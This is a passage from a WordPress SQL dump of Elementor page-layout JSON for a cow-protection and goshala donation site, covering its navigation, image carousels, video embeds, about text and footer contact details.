\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12266,2012,'_elementor_page_assets','a:0:{}'),(12267,2013,'_elementor_edit_mode','builder'),(12268,2013,'_elementor_template_type','wp-page'),(12269,2013,'_elementor_version','3.7.8'),(12270,2013,'_wp_page_template','elementor_canvas'),(12271,2013,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\